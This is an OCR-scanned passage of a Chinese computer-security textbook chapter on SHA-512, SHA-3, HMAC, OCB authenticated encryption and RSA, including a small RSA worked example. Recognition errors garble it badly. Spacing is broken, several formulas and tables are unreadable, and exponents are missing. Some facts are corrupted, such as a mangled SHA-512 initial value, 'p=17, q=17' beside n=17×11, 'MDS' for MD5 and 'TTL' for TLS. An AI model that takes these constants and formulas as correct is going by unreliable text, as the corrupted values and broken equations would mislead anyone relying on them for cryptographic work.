将 加 快 SHA-1 过 渡 到 其 他 版 本 (SHA-2 ) 的 速度 。 
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R 21-1 SHA 的 参数 比较 


mn pe per le ls le] | 
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ae | o | [ms | m | 2 | wm | i 


注 : 1. 所 有 大 小 均 以 “位 ”为 单位 ， 
2. 安全 依据 : 对 大 小 为 有 的 消息 摘要 进行 生日 攻击 ， 大 约 以 2 的 工作 因子 产生 碰 挤 。 
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+ 三 模 22 逐 字 相 加 
图 21-2 用 SHA-512 生成 消息 摘要 


本 市 将 对 SHA-512 进行 描述 ， 其 他 版 本 与 其 非常 类 似 。 该 算法 以 最 大 长 度 不 超过 2 
位 的 消息 作为 输入 ， 生 成 512 位 的 消息 摘要 作为 输出 。 输 入 以 1024 位 的 分 组 进行 处 理 。 图 
21-2 描述 了 处 理 消息 生成 摘要 的 全 过 程 。 处 理 过 程 包括 以 下 步骤 : 
。 步骤 1: 增加 填充 位 。 填 充 消 息 使 其 长 度 与 896 模 1024 同 余 ( 即 长 度 二 896 mod 
1024 )。 即 使 已 经 满足 上 述 长 度 要 求 ， 仍 然 需要 进行 填充 ， 因 此 填充 位 数 在 1 一 1024 之 
间 。 填 充 由 一 个 1 和 后 续 的 0 组 成 。 
eo 步骤 2: 填充 长 度 。 在 消息 后 附加 128 位 的 分 组 。 将 其 看 作 128 位 的 无 符号 整数 (最 高 
有 效 字 节 在 前 )， 它 还 含有 原始 消息 (未 填充 前 ) 的 长 度 。 
前 两 步 生成 了 长 度 为 1024 位 整数 倍 的 消息 。 在 图 21-2 中 ,被 扩充 的 消息 表示 为 
1024 位 分 组 序列 Mi, Mae, Mwy， 所 以 扩充 后 消息 总 长 度 为 NX1024 位 。 
e 步骤 3 : 初始 化 散 列 缓冲 区 。 散 列 函 数 的 中 间 结 果 和 最 终结 果 保 存在 512 位 的 缓冲 区 
中 ， 缓 冲 区 用 8 个 64 位 的 寄存 器 (a、b、c、d、e、f、g、h) 表示 ， 并 将 寄存 器 初始 
化 为 下 列 64 位 的 整数 (十 六 进 制 值 ): 
a 一 6A09E667F3BCC908 c 一 3C6EF372FE94F82B 
b=BB67AE8584CAA73B d=AS54FFS3A5F1D36F1 
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e=510E527FADE682D1 g=1F83D9ABFB41BD6B 
f=9B05688C2B3E6C1F h=5BE0CD19137E2179 


这 些 值 以 逆序 的 形式 〈 大 端 模式 ) 存储 ， 即 字 的 最 高 字 节 存在 最 低地 址 〈 最 左边 ) 


字 节 人 位置。 这些 字 取 自前 8 个 素数 平方 根 小 数 部 分 的 前 64 位 。 

e 步骤 4: 以 1024 位 (128 个 字 ) 为 单位 处 理 消息 。 算 法 的 核心 是 具有 80 轮 运 算 的 模 
块 。 该 模块 在 图 21-2 中 标记 为 E， 图 21-3 说 明了 它们 的 逻辑 关系 。 

每 一 轮 都 以 512 位 的 缓冲 区 值 abcedfgh 作为 输入 ， 并 且 更 新 缓冲 区 内 容 。 在 第 一 

轮 的 输入 端 ， 缓 冲 区 保存 中 间 散 列 

值 有 1。 在 任意 第 1 轮 ， 使 用 从 当前 | 


正在 处 理 的 1024 位 分 组 (Mi) 获取 | 消息 进度 表 


Ai, 


64 位 值 WW。 每 一 轮 还 使 用 外 加 党 
数 K (H P O<t<79) 表示 80 轮 
中 的 某 一 轮 。 这 些 字 取 自 前 80 个 素 
数 的 立方 根 小 数 部 分 的 前 64 位 。 这 
些 常 数 用 来 随机 化 64 位 模式 ， 消 
除 输入 数据 中 的 任何 规律 性 。 每 轮 
中 的 操作 包括 循环 移 位 和 基于 与 





(AND), #% (OR), 4E (NOT) 和 异 ° 
或 (XOR) 的 逻辑 运算 。 al bl el dl el fJ g] h 
第 80 轮 的 输出 加 到 第 1 轮 的 输 一 
A (Ai) ER Hio BK AES a a | 
8 个 字 与 瓦 , 中 相应 的 字模 2” 独立 Ti it 
相 加 。 in 
e 步骤 5: 输出 。 当 所 有 NN 个 1024 A 
位 的 分 组 都 处 理 完 毕 后 ， 从 第 N rt rt tt OF | 
AY By Be ay tH AY (i RE 512 A AY TA 
摘要 。 H 
SHA-512 算法 使 得 散 列 码 的 每 一 位 都 图 21-3 SHA-512 处 理 单 个 1024 位 的 分 组 


是 输入 端 每 一 位 的 函数 。 基 本 函数 的 复 

杂 和 迭 代 产 生 很 好 的 混 淆 效果 ; 即 随机 选取 两 组 即使 有 很 相似 的 规则 性 的 消息 也 不 可 能 生成 相同 
的 散 列 码 。 除 非 SHA-512 隐 含 一 些 直 到 现在 还 没有 公布 的 弱点 ， 构 造 具有 相同 消息 摘要 的 两 
条 消息 的 难度 为 2” 步 操 作 ， 而 找 出 给 定 摘要 的 消息 的 难度 为 2“ 步 操作 。 


21.1.3 SHA-3 


SHA-2， 特 别 是 512 位 版 本 ， 具 有 难以 破解 的 安全 性 。 尽 管 如 此 ， 有 一 点 依然 需要 注意 ， 
Bl SHA-2 与 其 后 继 版 本 都 具有 相同 的 结构 和 相同 的 数学 运算 。 一 旦 SHA-2 的 漏洞 被 发 现 ， 寻 
找 其 替代 算法 将 需要 很 长 时 间 。 因 此 ，NIST 在 2007 年 宣布 征集 下 一 代 NIST 散 列 水 数 ， 并 称 
之 为 SHA-3。 任 何 SHA-3 候选 算法 必须 满足 下 列 要 求 : 

1. SHA-3 必须 能 够 在 任何 应 用 中 即 插 即 用 地 替代 SHA-2。 因 此 ，SHA-3 必须 支持 长 度 为 
224, 256, 384 和 512 位 的 散 列 值 。 

2. SHA-3 必须 保留 SHA-2 的 在 线 特性 。 也 就 是 说 ， 该 算法 必须 能 够 一 次 处 理 相 对 小 的 消 
息 分 组 (512 或 1024 位 )， 而 不 将 未 处 理 的 消息 整体 缓存 在 内 存 中 。 
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经 过 广泛 的 讨论 和 审核 过 程 ，NIST 选择 了 一 个 成 功 提 交 并 发 布 的 SHA-3 作为 FIPS 202 
(SHA-3 标准 : 基于 置换 的 散 列 和 可 延展 的 函数 ，2015 年 8 月 )。 

SHA-3 中 使 用 的 结构 和 函数 与 SHA-2 和 SHA-1 的 完全 不 同 。 因 此 ， 如 果 在 SHA-2 或 者 
SHA-3 中 发 现 了 弱点 ， 使 用 者 可 以 选择 切换 到 其 他 的 标准 。SHA-2 很 好 地 经 受 了 检验 ， 并 且 
NIST 认为 其 安全 性 一 般 是 够 用 的 。 所 以 现在 ，SHA-3 是 SHA-2 的 补充 而 非 替 代 品 。SHA-3 相 
对 紧凑 的 特征 使 其 对 于 那些 连接 到 电子 网 络 但 称 不 上 是 完全 的 计算 机 的 能 人 式 或 智能 设备 非常 
有 用 。 例 如 一 些 传感器 ,尤其 是 在 构建 广泛 的 安全 系统 和 可 远程 控制 的 家 用 电子 产品 方面 。 关 
于 SHA-3 更 加 详尽 的 描述 将 在 附录 K 中 提 及 。 


21.2 HMAC 


在 这 一 节 ， 我们 关注 与 消息 认证 相关 的 散 列 码 。 附 录 E 展示 了 基于 分 组 密码 的 消息 认证 。 近 
年 来 ， 人 们 对 加 密 散 列 码 的 使 用 越 来 越 感 兴趣 ， 如 用 SHA-1 来 设计 MAC。 这 是 由 于 以 下 的 原因 : 

e 一 般 的 密码 散 列 消 数 其 软件 执行 速度 比 诸如 DES 这 样 的 传统 加 密 要 快 。 

e 密码 散 列 函数 的 代码 库 得 到 了 广泛 的 应 用 。 

诸如 SHA-1 这 样 的 散 列 函数 并 不 是 专 为 MAC 而 设计 的 ， 由 于 散 列 函数 不 依赖 于 秘密 密 
钥 ， 所 以 它 不 能 直接 用 于 MAC。 目 前， 关于 将 密 钥 加 到 现 有 的 散 列 函数 中 已 经 提出 了 许多 方 
案 ，HMAC[BELL96] 是 最 受 欢 迎 的 方案 之 一 。HAMC 已 作为 RFC 2104 (HMAC: 键 控 散 列 
消息 认证 ，1997 年 ) 发 布 ， 并 被 选 为 IP 安全 中 实现 MAC 必须 使 用 的 方法 ， 并 且 其 还 用 于 其 
他 Internet 协议 中 ， 如 传输 层 安 全 (TTL， 很 快 将 取代 安全 套 接 字 层 ( SSL)) 和 安全 电子 传输 
(SET) 协议 。 


21.2.1 HMAC 设计 目标 


RFC 2104 给 出 了 HMAC 的 设计 目标 : 

不 必修 改 而 直接 使 用 现 有 的 散 列 图 数 。 特 别 是 ， 很 容易 免费 得 到 软件 上 执行 速度 较 快 
的 散 列 函数 及 其 代码 。 

如 果 找 到 或 者 需要 更 快 或 更 安全 的 散 列 男 数 ， 应 能 很 容易 替代 原来 嵌入 的 散 列 函数 。 
应 保持 散 列 晒 数 的 原 有 性 能 ， 不 能 过 分 降低 其 性 能 。 

对 称 密 钥 的 使 用 和 处 理应 比较 简单 。 

如 果 已 知 谱 和 的 散 列 函数 的 强度 ， 则 完全 可 以 知道 认证 机 制 抗 密码 分 析 的 强度 。 

前 两 个 目标 是 HMAC 为 人 们 所 接受 的 主要 原因 。HMAC 将 散 列 函数 看 作 “ 黑 盒 ” 有 两 个 
好 处 。 第 一 ,实现 HMAC 时 ， 可 将 现 有 散 列 图 数 作为 一 个 模块 ， 这 样 可 以 对 许多 HMAC 代码 
预先 封装 ， 并 在 需要 时 直接 使 用 ; 第 二 ， 若 希望 替代 HMAC 中 的 散 列 函数 ， 则 只 需要 删除 现 
有 的 散 列 函数 模块 并 加 入 新 的 模块 ， 例 如 需要 更 快 的 散 列 函数 时 就 如 此 处 理 。 更 为 重要 的 是 ， 
如 果 般 入 的 散 列 函 数 的 安全 受到 威胁 ， 那 么 只 需要 用 更 安全 的 散 列 函 数 替换 艇 入 的 散 列 函数 。 
这 样 仍然 可 保持 HMAC 的 安全 性 。 

上 述 最 后 一 个 设计 目标 实际 上 是 HMAC 优 于 其 他 一 些 基于 散 列 函数 的 方法 的 主要 方面 。 
只 要 藤 入 的 散 列 函数 有 合理 的 密码 分 析 强 度 ， 则 可 以 证 明 HMAC 是 安全 的 。 本 节 后 面 再 讨论 
这 个 问题 ， 下 面 首先 讨论 HMAC 的 结构 。 


21.2.2 HMAC 算法 


图 21-4 给 出 了 HMAC 的 总 体 结构 ， 该 结构 定义 了 下 列 符号 : 
H=ik AM BO! eee (如 SHA). 
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M=HMAC HÄ BA (FR BA RA PRP ee SC ASE i ) o 

Y=M 的 第 i 个 分 组 ,0 二 i <<L-1。 

L=M 中 的 分 组 数 。 

b= 二 每 一 分 组 所 含 的 位 数 。 

n 二 舱 和 人 的 散 列 函 数 所 产生 的 散 列 码 长 度 。 

天 三 秘密 密 钥 ; 大 密 钥 的 长 度 大 于 b5， 则 将 密 钥 作为 散 列 也 数 的 输入 来 产生 一 个 nn 位 的 密 

钥 ; 建议 密 钥 长 度 宇 mn。 

K “二 为 使 为 b 位 长 而 在 KK 左边 填充 0 后 所 得 的 结果 。 

ipad=00110110 (十 六 进 制 数 36 ) 重复 b/8 次 。 

opad=01011100 (十 六 进 制 数 SC) 重复 b/8 次 。 

HMAC 可 描述 如 下 : 

HMAC(K, M)=HI[(K’ ® opad)||H[(K* ® ipad)||M]] 

也 就 是 说 ， gt 

LZEKWA WINGO, 44 Fb iL Ay K* 
(Pian, Æ K Æ 16012 A b=512, W Æ K P 
附加 入 44 CEF 0x00), 

2. K* 与 ipad 执行 异 或 运算 (位 异 或 ) 产 
生 4b 位 的 分 组 Sio 

3.4% M TF SR 

4. H EHTK 3 所 得 出 的 结果 。 

5. K` 与 opad 执行 异 或 运算 (位 异 或 ) 产 
Æ b MERJA Soo 

6. 将 步骤 4 中 的 散 列 码 附 于 5, 后。 

7. 将 五 作用 于 步骤 6 所 得 出 的 结果 ， 并 
输出 该 函数 值 。 

注意 , KS ipad 异 或 后 ， 其 信息 位 有 一 
半 发 生 了 变化 ; 同样 , 天 与 opad 异 或 后 ， 其 
信息 位 另 一 半 也 发 生 了 变化 ， 这 样 ， 通 过 将 
S: 与 5, 传 给 散 列 算法 ， 我们 可 以 从 KK 伪 随 机 
地 产生 出 两 个 密 钥 。 L HMACK, M) 

HMAC 执行 了 三 次 散 列 函数 (对 Sh S, A HMAC SHS 
和 内 部 的 散 列 产生 的 分 组 )， 但 对 于 长 消息 ，HMAC RRA HIRAI BR A A TV) MHA 
相同 。 


21.2.3 HMAC 的 安全 性 


任何 建立 在 舱 入 散 列 函数 基础 上 的 MAC， 其 安全 性 在 某 种 程度 上 依赖 于 该 散 列 函数 的 强 
BE, HMAC 的 好 处 在 于 ， 其 设计 者 可 以 证 明 舱 入 的 散 列 函数 的 强度 与 HMAC 的 强度 之 间 的 
联系 。 

根据 伪造 者 在 给 定时 间 内 伪造 成 功 和 用 相同 密 钥 产生 给 定数 量 的 消息 -MAC 对 的 概率 ， 
可 以 来 描述 MAC 函数 的 安全 性 。 本 质 上 ， 这些 消息 由 合法 用 户 产 生 .[BELL96] 中 已 经 证 明 ， 
如 果 攻 击 者 已 知 若 于 (时 间 ， 消 息 -MAC 对 )， 则 成 功 攻 击 HMAC AY BEARS Ot TFE te A BO 
PAA FZ: 


ipad 
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1. 即使 对 攻击 者 而 言 ，1V 是 随机 的 、 秘 密 的 和 未 知 的 ， 攻 击 者 也 能 计算 压缩 函数 的 输出 。 
2. 即使 斑 是 随机 的 和 秘密 的 ， 攻 击 者 也 能 找到 散 列 少数 中 的 碰撞 。 

rt Piatt, FEAT ADK SEA eR CE EO a) eH RA Ob i oP A 
消息 ， 散 列 函 数 的 IV 被 一 个 n 位 秘密 的 随机 值 代 蔡 。 攻 击 该 散 列 函数 或 者 是 对 窗 钥 的 蛮 
力 攻击 (其 代价 为 2 数量 级 )， 或 者 是 生日 攻击 一 一 这 是 第 二 种 攻击 的 特例 ,请 见 下 面 的 
讨论 。 

， 在 第 二 种 攻击 中 ,攻击 者 要 找 两 条 消息 M 和 M'， 它 们 产生 相同 的 散 列 码 : H(M)= 
HM’). 这 就 是 以 前 提 到 的 生日 攻击 ， 我 们 已 经 证 明 其 所 需 的 代价 为 2 数量 级 。 根 据 现在 
的 技术 ， 若 代价 为 2” 数量 级 ， 则 被 认为 是 可 行 的 ， 所 以 MDS 的 安全 性 不 能 得 到 保证 。 但 
E, RGR RR MDS 这 样 的 128 位 散 列 函数 不 能 用 于 HMAC We? 回答 是 否定 的 ， 因 为 
要 攻击 MD5， 攻击 者 可 以 选择 任何 消息 集 ， 并 用 专用 计算 机 离线 计算 来 寻找 碰撞 ， 由 于 攻 
击 者 知道 散 列 算法 和 默认 的 不 ， 因 此 攻击 者 可 以 对 其 产生 的 任何 消息 计算 散 列 码 。 但 是 ， 攻 
击 HMAC 时 ， 由 于 攻击 者 不 知道 K， 所 以 ， 他 不 能 离线 产生 消息 / 散 列 码 对 ， 他 必须 观察 
HMAC 用 相同 的 密 钥 产生 的 消息 序列 ， 并 对 这 些 消 息 进行 攻击 。 散 列 码 长 为 128 位 时 ， 攻 击 
者 必须 观察 2” 个 由 同一 密 钥 产生 的 分 组 (2” 位 )， 对 于 1Gbps 的 链 路 ， 要 想 攻 击 成 功 ， 攻 击 
者 约 需 150 000 年 来 观察 同一 密 钥 产生 的 连续 消息 流 。 因 此 ， 当 注重 执行 速度 时 ， 用 MDS 而 
不 是 SHA 作为 HMAC AIHA BIO PRP, SEE AT WEY. 


21.3 EWE 


认证 加 密 ( AE) 是 一 个 术语 ， 用 于 描述 一 个 加 密 系 统 ， 该 系统 能 够 同时 保护 通信 的 机 密 
性 和 真实 性 〈 完 整 性 ); BI AE 同时 提供 消息 加 密 和 消息 认证 功能 。 许 多 应 用 程序 和 协议 都 需要 
这 两 种 形式 的 安全 性 保证 ,但 直到 最 近 这 两 项 服务 都 是 分 开设 计 的 。AE 是 使 用 分 组 密码 模式 
结构 实现 的 。 在 许多 应 用 中 使 用 的 一 个 例子 是 附录 E 中 描述 的 CCM。 在 本 节 中 ,我们 将 讨论 
偏 移 密码 本 (OCB) [ROGA03]。OCB 是 NIST 提出 的 分 组 密码 操作 模式 [ROGA01]， 并 且 是 
RFC 7253 (OCB 认证 加 密 算 法 ，2014 年 ) 中 定义 的 建议 Internet 标准 。OCB 也 被 认可 为 IEEE 
802.11 无 线 LAN 标准 中 的 认证 加 密 技 术 。 而 且 ， 正 如 第 13 章 所 述 ，OCB 包含 在 开源 的 IoT 
安全 模块 MiniSec 中 。 

OCB 的 一 个 关键 目标 是 效率 。 这 是 通过 最 小 化 每 个 消息 所 需 的 加 密 次 数 ， 并 且 人 允许 对 消 
息 分 组 进行 并 行 操作 来 实现 的 。 

图 21-5 显示 了 OCB 加 密 和 认证 的 整体 结构 。 通 常 ，AES 被 用 作 加 密 算法 。 要 加 密 和 认证 
的 消息 M 被 分 成 n 位 分 组 ， 除 了 最 后 一 个 分 组 可 能 少 于 n 位。 通常 ，n=128。 只 需要 对 消息 执 
行 一 遍 就 可 以 生成 密 文 和 认证 码 。 分 组 的 总 数 是 m=|len(M)/nil。 

请 注意 ，OCB 的 加 密 结 构 与 电子 密码 本 (ECB) 模式 的 加 密 结 构 相 似 。 每 个 分 组 都 独立 于 
其 他 分 组 进行 加 密 ， 因 此 可 以 同时 执行 所 有 m 个 加 密 。 正 如 在 第 20 章 中 提 到 的 那样 ， 在 ECB 
中 ， 如 果 在 消息 内 出 现 多 次 相同 的 b 位 明文 分 组 ， 那么 它 总 会 产生 相同 的 密 文 。 因 此 ， 对 于 元 
长 的 信息 ，ECB 模式 可 能 不 安全 。OCB 通过 对 每 一 组 M[i] 使 用 一 个 偏 移 量 Z[i] 从 而 消除 这 
个 影响 ， 以 至 Zi 是 独一无二 的 。 这 个 偏 移 量 会 与 明文 做 异 或 操作 并 与 加 密 好 的 输出 再 次 做 
异 或 操作 。 因 此 ， 由 加 密 密 钥 K 我 们 有 : 


C[i]=Ex(M[i] © Z[i]) © Zi 


Ex(X) 表示 对 明文 使 用 密 钥 K 加 密 的 结果 ， 甸 是 独 有 的 或 操作 。 由 于 使 用 了 偏 移 量 ， 
同一 消息 中 的 两 个 相同 分 组 会 产生 两 个 不 同 的 密 文 。 
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L 和 R 用 来 产生 
Z[1], Z[2], = 


Bz 
CT] 


n= 分 组 的 长 度 ， 以 位 为 单位 

N= nonce 

len(M[m]) = 使 用 n 位 整数 表示 的 MIm] 的 长 度 
trunc(Y[m])= 删 除 最 低 有 效 位 ， 使 结果 长 度 与 M[m] 相 同 
pad= 填 充 最 低 有 效 0 位 到 长 度 n 

r= 认证 标签 的 长 度 


图 21-5” OCB 加 密 和 认证 


图 21-5 的 上 半 部 分 展示 了 Zli] 是 如 何 产生 的 。 被 称 为 nonce (随机 数 ) 的 任意 nn 位 值 N 被 |644 
选择 ; 唯一 的 要 求 是 如 果 多 个 消息 使 用 相同 的 密 钥 加 密 ， 则 每 次 必须 使 用 不 同 的 nonce， 以便 leds 
每 个 nonce 只 使 用 一 次 。 每 一 个 不 同 的 N 值 产生 一 个 不 同 的 2 器 集 合 。 因 此 ， 如 果 两 个 不 同 
的 消息 在 同一 个 位 置 有 相同 的 分 组 ， 那 么 它们 将 产生 不 同 的 密 文 ， 因 为 Z[ 站 不同。2Z[D] 的 计算 
有 些 复杂 ， 可 以 总 结 为 以 下 等 式 : 

L(0)=L=Ex(0"), 0" 表示 nn 个 0 位 

R=Ex(N@®L) 

L(i)=2 * L(i-1), 1<i<m 

Z[1J=L @R 

Z[i]=Z(i-1) © Lintz(i)), 1<i<m 

BRIT. 指 的 是 在 有 限 域 CF(2") 上 的 乘法 运算 ; 关于 有 限 域 的 讨论 超出 了 我 们 的 范围 ， 

在 [STAL17] 内 会 有 详细 讨论 。 运 算 符 ntz(i) 表示 i 中 尾部 (最 低 有 效 ) 零 的 数目 。 所 得 到 的 
Zi] 值 是 分 开 的 最 大 汉 明 距离 [WALK05]。 

因此 , {A Z[i] & nonce 和 加 密 密 钥 的 图 数 。nonce 不 需要 保密 ， 并 以 规范 范围 之 外 的 方式 

传达 给 接收 方 。 
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因为 M 的 长 度 可 能 不 是 n 的 整数 倍 ， 所 以 最 终 的 分 组 被 区 别 对待 ， 如 图 21-5 所 示 。M[m] 
的 长 度 ， 可 以 表示 为 一 个 n 位 的 整数 ， 用 来 计算 XX[m]=lenM[m]) DLC) ® Zim] L(-1) 可 
以 被 看 作 是 有 限 域 中 的 LZ/2， 相 当 于 L' 2"。 接 下 来 ，Y[m]=Ex(X[m])。 接 下 来 ,，Y[m] 缩短 到 
lenM [m] 位 (通过 删除 最 低 有 效 位 需要 的 数字 ) 并 且 和 M[m] 执行 异 或 操作 。 因 此 ， 最 后 一 个 
密 文 C 和 最 初 的 明文 M 长 度 相同 。 

一 个 由 信息 M 产生 的 校 验 和 如 下 : 

7 BERAI =M [1] © M[2] O---D Yim] ® CIm]0 

Hp, Cimo 由 C[m] 组 成 ， 用 最 低 有 效 位 填充 。 最 后 ， 使 用 与 加 密 相同 的 密 钥 生 成 长 度 

为 + 的 认证 标签 : 
标签 =Ex( 校 验 和 名 Z[m]) 的 前 rz 位 

标签 的 位 长 z 根 据 应 用 而 变化 。 标 签 的 大 小 控制 了 认证 级 别 。 为 了 验证 认证 标签 ， 解 密 需 
可 以 重新 计算 校 验 和 ， 然 后 重新 计算 标签 ， 最 后 检查 是 否 与 发 送 的 相同 。 如 果 密 文通 过 测试 ， 
则 OCB 通常 会 生成 明文 。 

图 21-6 总 结 了 用 于 加 密 和 解密 的 OCB 算法 。 很 容易 便 能 看 出 解密 是 加 密 的 逆 过 程 。 我 
们 有 

Ex(M{i] © Z[i]) ® Z[i]=C[i] 
Ex(M{i] ® Z[i])=C[i] ® Zi 
Dx( Ex(M[i] © Z[i]))=Dx( Cli] © Z[i]) 
MI[i] ® Z[i]=Dx(C[i] ® Z[i]) 
M[i}=Dx(C[i] © Z[i]) © Z[i] 


algorithm í OCB- Encryptx(N,M) © | algorithm OCB-Decrypt,(N, M) 
Partition M into Mit]. Mn ioe | Partition M into Ma] coal 
LE RO ERO) e ore sate LALA Be 
Re EWN. @L) Se ， | R—E(N@L) © | 
ric lomdo Ll) 2 Li - ~ D _ | forie 1 tom do D Alm L(i 一 D 
PUD i ae = . x ,LU=L' 2 : 
ZU LOR | ZI1~L@R | 
fori i < 一 -2 tom do zil- t“ -zli - 一 le ® Lia) | fori—2tom do iezi- A ® Linta(i)) 
Dr i<— 11 、 ricltom-1do fo a 
| Mi] —Dx(Cfi] @ Zli) ® zl] 
1 Xm]: “一 -len(M[m]) ® ate ® Zim) 
- > ae iy Yim] 一 x(X[m]) | a 
Y[m]) Mim] < 一 ce len(Cm) b bits of Yim) © cm 


Ciajor@ Yin}. | le eMo- je > Om" @ Yim 
bml | Tag -E x(Checksum @ ) Z[m]) [first r bits] 


图 21-6 OCB 算法 





21.4 RSA 公 钥 加 密 算 法 


或 许 RSA 和 Diffie-Hellman 是 使 用 最 广泛 的 公 钥 加 密 算 法 。 这 里 讨论 RSA 及 其 安全 方面 
的 问题 8。21.5 节 介 绍 Diffie-Hellman. 


O ”本 节 使 用 一 些 数论 的 基本 概念 ， 请 参考 附录 Bo 
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21.4.1 算法 描述 


MIT 的 Ron Rivest, Adi Shamir 和 Len Adleman 于 1977 年 提出 并 于 1978 年 首次 发 表 的 算 
法 [RIVE78] 是 最 早 的 一 种 公 钥 算法 。RSA 算法 自 其 诞生 之 日 起 ， 就 成 为 被 广泛 接受 且 实 现 的 
通用 公 钥 加 密 算 法 。RSA 是 一 种 分 组 密码 ， 其 明文 和 密 文 均 是 0 一 (Ca 一 1) 之 间 的 整数 。 
对 明文 分 组 M 和 密 文 分 组 C， 加 密 和 解密 过 程 如 下 : 
C=M* mod n 
M=C* mod n=(M°) mod n=M“ mod n 
其 中 收发 双方 均 已 知 n 和 e， 只 有 接收 方 知道 g。 公 钥 加 密 算法 的 公 钥 为 PU= {fe, n}， 私 
钥 为 PR= {q,n}。 该 算法 要 能 用 作 公 钥 加 密 ， 必 须 满足 下 列 条 件 : 
1. TARS) e, din, 使 得 对 所 有 M<n, @ M° modn=M, 
2. 对 所 有 M<n, 计算 M* 和 CC" 是 比较 容易 的 。 
3. 由 e 和 nn 确定 4 是 不 可 行 的 。 
前 两 个 要 求 是 容易 满足 的 ， 当 e 和 nn 取 很 大 的 值 时 第 三 个 要 求 也 能 够 得 到 满足 。 
我 们 主要 讨论 第 一 个 要 求 ， 需 要 找 出 下 列 关 系 式 : 
M“ mod n=M 
WR e 和 4 是 模 b(n) 的 乘法 逆 元 ， 上 述 关系 成 立 ， 其 中 $(n) 是 欧 拉 函数 。 在 附录 B 中 
描述 了 对 于 素数 P 和 9， 有 J$(pq)==(p-1)(q-1)， 也 就 是 说 的 欧 拉 函 数 是 小 于 n 且 与 n 互 素 
的 正 整数 的 个 数 。e 和 4 的 关系 可 如 下 描述 : 
ed mod ¢(n)=1 
目 式 等 昼 于 ， 
ed mod p(n)=1 
d mod (n)=e"' 
也 就 是 说 ，e M dE b(n) REKI, MERA RM, A dM d(n) 互 素 (因此 e 和 
b(n) 也 互 素 )， 即 ged( p(n), d)=1; 也 就 是 说 ，d 和 b(n) 的 最 大 公约 数 是 1。 
图 21-7 总 结 了 RSA 算法 。 开 始 选择 两 个 素数 总 和 4， 计 算 它 们 的 积 半 作为 加 密 和 解密 的 
模 。 接 着 计算 n EKA b(n). PIRES b(n) 互 素 的 整数 e ( 即 e 和 b(n) 的 最 大 公约 
数 是 1 )。 最 后 计算 e 关于 模 b(n) 的 乘法 逆 元 4。d 和 e 具有 所 期 望 的 属性 。 
假定 用 户 A 已 经 公布 其 公 钥 ， 用 户 B 要 发 送 消息 MM 给 A， 那么 用 户 B 计算 C=M“(mod 
n), FRX C; 在 接收 端 ， 用 户 A 计算 M=C%(mod n) 解密 出 消息 M. 
图 21-8 所 示 的 是 [SING99] 中 给 出 的 一 个 例子 。 本 例 中 ， 密 钥 产 生 过 程 如 下 : 
1. 选择 两 个 素数 ,p= 二 17 Fil q=17. 
2. HA n=pq=17X 11=187, 
3. 计算 6(n)=(p-1\(q-1)=16 X 10= 160. 
4. 选择 e 使 其 与 h(n)=160 RAF O(n), BIE e=7. - 
5. 确定 d 使 得 de mod 160=1 H d<160, AA 23X7=161=(1X160)+1, PUA d=23, 
所 得 的 公 钥 PU={7, 1871， 私 钥 PR 二 {23, 187}。 这 个 例子 说 明 输 入 明文 M=88 时 密 钥 的 
使 用 情况 。 加 密 时 ， 需 要 计算 C=88' mod 187。 利 用 模 算术 的 性 质 ， 我 们 进行 如 下 计算 : 
88’ mod 187=[(88* mod 187) X (88° mod 187) X(88' mod 187)] mod 187 
88' mod 187=88 
88° mod 187=7744 mod 187=77 
88° mod 187=59969536 mod 187= 132 
88’ mod 187=(88 X 77 X 132) mod 187=894432 mod 187=11 
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解密 时 ， 我 们 计算 M=11” mod 187: 
11” mod 187=[(11' mod 187) X (11? mod 187) X (11* mod 187) X 
(11° mod 187) X (11° mod 187)]mod 187 
11' mod 187=11 
11° mod 187=121 
11* mod 187=14641 mod 187=55 
11° mod 187=214358881 mod 187=33 
11” mod 187=(11 X 121 X 55 X33 X33) mod 187=79720245 mod 187=88 
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648 图 21-8 RSA 算法 举例 
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21.4.2 RSA 的 安全 性 


对 RSA 算法 的 攻击 可 能 有 如 下 4 种 方式 : 

e 蛮 力 攻击 : 这 种 方法 试图 穷 举 所 有 可 能 私 钥 。 

e 数学 攻击 : 有 多 种 数学 攻击 方法 ， 它 们 的 实质 都 是 试图 分 解 两 个 素数 的 乘积 。 

e 计时 攻击 : 这 种 方法 依赖 于 解密 算法 的 运行 时 间 。 

© 选择 密 文 攻击 : 这 种 类 型 的 攻击 试图 发 现 RSA 算法 的 规则 。 对 这 种 攻击 的 讨论 超出 了 

本 书 的 范围 。 

像 其 他 密码 体制 一 样 ，RSA 抗 蛮 力 攻击 的 方法 也 是 使 用 大 密 钥 空间 ， 所 以 e 和 4 的 位 数 

越 大越 好 。 但 是 密 钥 产生 的 过 程 和 加 /解密 过 程 都 包含 复杂 的 运算 ， 因 此 ， 密 钥 越 大 ， 系 统 运 
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行 速 度 越 慢 。 

下 面 我 们 人 简要 介绍 数学 攻击 和 计时 攻击 。 

因子 分 解 问题 “我们 可 以 把 用 数学 方法 攻击 RSA 的 途径 分 为 三 种 : 

e 分 解 n 为 两 个 窒 因 子 。 这 样 可 以 计算 出 $(n)==(p 一 1)X(g 一 1)， 从 而 可 以 确定 d= 

e (mod $ (n))。 

e 直接 确定 b(n) 而 不 先 确定 p 和 gqg。 这 同样 也 可 确定 d=e'(mod d(n)). 

e 直接 确定 4， 而 不 先 确定 (n) 

对 RSA 的 密码 分 析 的 讨论 大 都 集中 于 将 n 分解 为 两 个 素 因 子 。 由 给 定 的 n 来 确定 h(n) 等 
价 于 因子 分 解 n[RIBE96]。 现 在 已 知 的 从 e 和 确定 4 的 算法 至 少 和 因子 分 解 问题 一 样 费时 。 
因此 ， 我 们 通过 将 因子 分 解 的 性 能 作为 基准 来 评价 RSA 的 安全 性 。 

尽管 因子 分 解 具有 大 素数 因子 的 数 n 仍然 是 一 个 难题 ,但 是 不 像 以 前 那样 困难 。 与 对 
DES 的 算法 一 样 ，RSA 实验 室 同 时 还 发 布 了 用 位 数 为 100、110 或 120 等 的 密 钥 加 密 的 密 文 
件 供 有 兴趣 者 解密 。 最 近 被 解密 的 是 RSA-768， 其 密 钥 长 度 为 232 十 进 制 位 或 768 二 进 
制 位 。 表 21-2 给 出 了 迄今 为 止 得 出 的 一 些 结果 。 


表 21-2 因子 分 解 问题 的 进展 情况 
100 332 1991 年 4 月 
120 398 1993 年 6 月 
130 431 1996 4F 4 H 
155 512 1999 年 8 月 
174 576 2003 年 12 月 
193 640 2005 4F 11 月 
232 768 2009 年 12 H 


注意 表 21-2 所 使 用 的 因子 分 解 方法 。 在 20 世纪 90 年 代 中 期 以 前 一 直 是 用 二 次 筛 法 来 进 
